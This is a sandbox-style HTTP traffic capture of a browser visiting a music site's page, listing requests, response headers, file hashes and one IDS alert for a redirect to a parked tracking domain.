Vary: Accept-Encoding


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   9529
Md5:    cda04fe2a2ffbb1923ea1ae5eca7264e
Sha1:   f005f7e64968a5d6e54463cadc959d1d2fd093e1
Sha256: dd9e5c29f0c2c1743ff9908cf1c650329d7816c1bb4dd7d437569bdd81fc369f
                                        
                                            GET /yts/cssbin/www-player-vfl9xqmUY.css HTTP/1.1 
Host: www.youtube.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.youtube.com/embed/6H2EOmf_vJQ
Cookie: VISITOR_INFO1_LIVE=VDBjT-m9Syc; YSC=hEExb76W9tA; PREF=f1=50000000; GPS=1

                                         
                                         172.217.20.46
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding, Origin
Content-Encoding: gzip
Timing-Allow-Origin: https://www.youtube.com
Content-Length: 53591
Date: Wed, 05 Jun 2019 15:52:29 GMT
Expires: Thu, 04 Jun 2020 15:52:29 GMT
Last-Modified: Tue, 04 Jun 2019 22:08:34 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Cache-Control: public, max-age=31536000
Age: 427509
Alt-Svc: quic=":443"; ma=2592000; v="46,44,43,39"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   53591
Md5:    afce3aef197fe3bbdf78549936991d28
Sha1:   cf888394a4379634b4617ab9a93f9c621deca2d6
Sha256: f65f93b2b3c2fb030a2d52dbe341c90438f928023da0f2e45e65eff5847943e9
                                        
                                            GET /px.gif?ch=2&rn=3.5120403258395942 HTTP/1.1 
Host: ww25.kfc.i.illuminationes.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ww25.kfc.i.illuminationes.com/snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com

                                         
                                         199.59.242.151
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: openresty
Date: Mon, 10 Jun 2019 14:37:38 GMT
Content-Length: 42
Last-Modified: Sun, 02 Jun 2019 23:47:07 GMT
Connection: keep-alive
Etag: "5cf45ffb-2a"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   42
Md5:    d89746888da2d9510b64a9f031eaecd5
Sha1:   d5fceb6532643d0d84ffe09c40c481ecdf59e15a
Sha256: ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
                                        
                                            GET /px.gif?ch=1&rn=3.5120403258395942 HTTP/1.1 
Host: ww25.kfc.i.illuminationes.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ww25.kfc.i.illuminationes.com/snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com

                                         
                                         199.59.242.151
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: openresty
Date: Mon, 10 Jun 2019 14:37:38 GMT
Content-Length: 42
Last-Modified: Sun, 02 Jun 2019 23:47:07 GMT
Connection: keep-alive
Etag: "5cf45ffb-2a"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   42
Md5:    d89746888da2d9510b64a9f031eaecd5
Sha1:   d5fceb6532643d0d84ffe09c40c481ecdf59e15a
Sha256: ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
                                        
                                            GET /snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com HTTP/1.1 
Host: ww25.kfc.i.illuminationes.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://theforestsessions.com/redooen/about/

                                         
                                         199.59.242.151
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: openresty
Date: Mon, 10 Jun 2019 14:37:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IG7SHObzICYKHaBOUbC+jMeLDLR5s90PipG69dksYAn5Atc2WeM+jN0TYh0+vf0jbtmiBTCYdx5AeZ3RhVWVZA==


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   4028
Md5:    5e316cdcbcefc5a280fd83d5a776ba43
Sha1:   f58eb484a49cff055b373d68e3dc31b7581706ff
Sha256: d7f917314f16158af6778951585c28fae5412ddab6c306becfc049222af35615

Alerts:
  IDS:
    - ET CURRENT_EVENTS Evil Redirector Sep 29 2015
                                        
                                            GET /yts/jsbin/www-embed-player-vflHkE08a/www-embed-player.js HTTP/1.1 
Host: www.youtube.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.youtube.com/embed/6H2EOmf_vJQ
Cookie: VISITOR_INFO1_LIVE=VDBjT-m9Syc; YSC=hEExb76W9tA; PREF=f1=50000000; GPS=1

                                         
                                         172.217.20.46
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding, Origin
Content-Encoding: gzip
Timing-Allow-Origin: https://www.youtube.com
Content-Length: 38650
Date: Thu, 06 Jun 2019 22:40:18 GMT
Expires: Fri, 14 Jun 2019 22:40:18 GMT
Last-Modified: Thu, 06 Jun 2019 05:59:29 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Cache-Control: public, max-age=691200
Age: 316640
Alt-Svc: quic=":443"; ma=2592000; v="46,44,43,39"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   38650
Md5:    f8afcd8920b079e50ab16f75c6a47837
Sha1:   5b440079f128fa91a8fe4de3efae23703593ba20
Sha256: 43b95f51a07aaf74979441a285bee7774f022b4b6ea09fe80c6944bd3b1bc1ed
                                        
                                            GET /px.gif?ch=1&rn=4.590763023574391 HTTP/1.1 
Host: ww25.kfc.i.illuminationes.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ww25.kfc.i.illuminationes.com/snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com

                                         
                                         199.59.242.151
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: openresty
Date: Mon, 10 Jun 2019 14:37:38 GMT
Content-Length: 42
Last-Modified: Sun, 02 Jun 2019 23:47:07 GMT
Connection: keep-alive
Etag: "5cf45ffb-2a"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   42
Md5:    d89746888da2d9510b64a9f031eaecd5
Sha1:   d5fceb6532643d0d84ffe09c40c481ecdf59e15a
Sha256: ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
                                        
                                            GET /px.gif?ch=1&rn=8.847065328139752 HTTP/1.1 
Host: ww25.kfc.i.illuminationes.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ww25.kfc.i.illuminationes.com/snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com

                                         
                                         199.59.242.151
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: openresty
Date: Mon, 10 Jun 2019 14:37:38 GMT
Content-Length: 42
Last-Modified: Sun, 02 Jun 2019 23:47:13 GMT
Connection: keep-alive
Etag: "5cf46001-2a"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   42
Md5:    d89746888da2d9510b64a9f031eaecd5
Sha1:   d5fceb6532643d0d84ffe09c40c481ecdf59e15a
Sha256: ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
                                        
                                            GET /px.gif?ch=2&rn=8.847065328139752 HTTP/1.1 
Host: ww25.kfc.i.illuminationes.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ww25.kfc.i.illuminationes.com/snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com

                                         
                                         199.59.242.151
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: openresty
Date: Mon, 10 Jun 2019 14:37:38 GMT
Content-Length: 42
Last-Modified: Sun, 02 Jun 2019 23:47:00 GMT
Connection: keep-alive
Etag: "5cf45ff4-2a"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   42
Md5:    d89746888da2d9510b64a9f031eaecd5
Sha1:   d5fceb6532643d0d84ffe09c40c481ecdf59e15a
Sha256: ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
                                        
                                            GET /px.gif?ch=2&rn=4.590763023574391 HTTP/1.1 
Host: ww25.kfc.i.illuminationes.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ww25.kfc.i.illuminationes.com/snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com

                                         
                                         199.59.242.151
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: openresty
Date: Mon, 10 Jun 2019 14:37:38 GMT
Content-Length: 42
Last-Modified: Sun, 02 Jun 2019 23:47:07 GMT
Connection: keep-alive
Etag: "5cf45ffb-2a"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   42
Md5:    d89746888da2d9510b64a9f031eaecd5
Sha1:   d5fceb6532643d0d84ffe09c40c481ecdf59e15a
Sha256: ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
                                        
                                            GET /yts/jsbin/player_ias-vfl25EWhw/en_US/base.js HTTP/1.1 
Host: www.youtube.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.youtube.com/embed/6H2EOmf_vJQ
Cookie: VISITOR_INFO1_LIVE=VDBjT-m9Syc; YSC=hEExb76W9tA; PREF=f1=50000000; GPS=1

                                         
                                         172.217.20.46
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding, Origin
Content-Encoding: gzip
Timing-Allow-Origin: https://www.youtube.com
Content-Length: 384251
Date: Thu, 06 Jun 2019 22:42:57 GMT
Expires: Fri, 14 Jun 2019 22:42:57 GMT
Last-Modified: Thu, 06 Jun 2019 04:05:08 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Cache-Control: public, max-age=691200
Age: 316481
Alt-Svc: quic=":443"; ma=2592000; v="46,44,43,39"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   384251
Md5:    1aaacba46a3fc3285bd2715cb85a0d8b
Sha1:   a45371687ed4a89363e05cfce83505948c580a5f
Sha256: 4460f0f31d1f17fd47f02892083531b09014501bb6042f837213796401f6a562
                                        
                                            GET /s/roboto/v18/KFOmCnqEu92Fr1Mu4mxM.woff HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.youtube.com/embed/6H2EOmf_vJQ
Origin: https://www.youtube.com

                                         
                                         172.217.22.163
HTTP/1.1 200 OK
Content-Type: font/woff
                                        
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Content-Length: 19824
Date: Mon, 03 Jun 2019 09:53:01 GMT
Expires: Tue, 02 Jun 2020 09:53:01 GMT
Last-Modified: Mon, 16 Oct 2017 17:32:56 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Cache-Control: public, max-age=31536000
Age: 621880
Alt-Svc: quic=":443"; ma=2592000; v="46,44,43,39"


--- Additional Info ---
Magic:  data
Size:   19824
Md5:    bafb105baeb22d965c70fe52ba6b49d9
Sha1:   934014cc9bbe5883542be756b3146c05844b254f
Sha256: 1570f866bf6eae82041e407280894a86ad2b8b275e01908ae156914dc693a4ed
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         216.58.207.227
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Mon, 10 Jun 2019 14:37:41 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   471
Md5:    f1fea07f548d4ff0bf2a0f4aa32b2d58
Sha1:   03fb37cb2ce610e96b53227583083ed7eab5bc60
Sha256: 08276f601d6500298e9d29f101446e27767c0652cc4cf070eca8660b2fe4403d
                                        
                                            GET /ga.js HTTP/1.1 
Host: ssl.google-analytics.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://bandcamp.com/EmbeddedPlayer.html/ref=http%253A%252F%252Ftheforestsessions.com%252Fredooen%252Fabout%252F/album=2437981243/size=large/bgcol=333333/linkcol=ffffff/transparent=true/

                                         
                                         216.58.207.232
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Strict-Transport-Security: max-age=10886400; includeSubDomains; preload
Timing-Allow-Origin: *
Date: Mon, 10 Jun 2019 13:14:31 GMT
Expires: Mon, 10 Jun 2019 15:14:31 GMT
Last-Modified: Tue, 21 May 2019 23:53:44 GMT
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 17168
Cache-Control: public, max-age=7200
Age: 4990
Alt-Svc: quic=":443"; ma=2592000; v="46,44,43,39"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   17168
Md5:    01d5892e6e243b52998310c2925b9f3a
Sha1:   58180151b6a6ee4af73583a214b68efb9e8844d4
Sha256: 7e90efb4620a78e8869796d256bcddbde90b853c8c15c5cc116cb11d3d17bc4d
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: theforestsessions.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: 60gpBAK=R1224190331; 60gp=R2337348221; PHPSESSID=fcf404e00c4c88ba233c8611e7468caf

                                         
                                         213.186.33.19
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Set-Cookie: 60gp=R2337348221; path=/; expires=Mon, 10-Jun-2019 15:56:33 GMT
Date: Mon, 10 Jun 2019 14:37:41 GMT
Server: Apache
Content-Length: 209
X-IPLB-Instance: 17321


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   209
Md5:    18ffb59b61525f781cf9251045be575d
Sha1:   bd7318b00b15b7a1c8a48524419fa2e5c27a5b6d
Sha256: b6682cab65d3243b5b75efb7279dbf49491957484780f2ba0a87632cc0e25642
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: theforestsessions.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: 60gpBAK=R1224190331; 60gp=R2337348221; PHPSESSID=fcf404e00c4c88ba233c8611e7468caf

                                         
                                         213.186.33.19
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Set-Cookie: 60gp=R2337348221; path=/; expires=Mon, 10-Jun-2019 15:37:12 GMT
Date: Mon, 10 Jun 2019 14:37:44 GMT
Server: Apache
Content-Length: 209
X-IPLB-Instance: 504


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   209
Md5:    18ffb59b61525f781cf9251045be575d
Sha1:   bd7318b00b15b7a1c8a48524419fa2e5c27a5b6d
Sha256: b6682cab65d3243b5b75efb7279dbf49491957484780f2ba0a87632cc0e25642
                                        
                                            GET /tmpdata/cache/jquery_ui_bundle_min_88620fcd733dfe9ed2d4a470d2f5c28e.js HTTP/1.1 
Host: s4.bcbits.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://bandcamp.com/EmbeddedPlayer.html/ref=http%253A%252F%252Ftheforestsessions.com%252Fredooen%252Fabout%252F/album=2437981243/size=large/bgcol=333333/linkcol=ffffff/transparent=true/

                                         
                                         0.0.0.0
                                        


--- Additional Info ---
                                        
                                            GET /tmpdata/cache/embedded_player_bundle_6cf581cfb4d19abcf44c978e1a3376eb.css HTTP/1.1 
Host: s4.bcbits.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://bandcamp.com/EmbeddedPlayer.html/ref=http%253A%252F%252Ftheforestsessions.com%252Fredooen%252Fabout%252F/album=2437981243/size=large/bgcol=333333/linkcol=ffffff/transparent=true/

                                         
                                         0.0.0.0
                                        


--- Additional Info ---
                                        
                                            GET /tmpdata/cache/embedded_player_v3_bundle_da87b1c1138b7d55cc513d7683863c13.css HTTP/1.1 
Host: s4.bcbits.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://bandcamp.com/EmbeddedPlayer.html/ref=http%253A%252F%252Ftheforestsessions.com%252Fredooen%252Fabout%252F/album=2437981243/size=large/bgcol=333333/linkcol=ffffff/transparent=true/

                                         
                                         0.0.0.0
                                        


--- Additional Info ---
                                        
                                            GET /tmpdata/cache/v3_large_40b335e7d2273cdbbe2b231285051594.css HTTP/1.1 
Host: s4.bcbits.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://bandcamp.com/EmbeddedPlayer.html/ref=http%253A%252F%252Ftheforestsessions.com%252Fredooen%252Fabout%252F/album=2437981243/size=large/bgcol=333333/linkcol=ffffff/transparent=true/

                                         
                                         0.0.0.0
                                        


--- Additional Info ---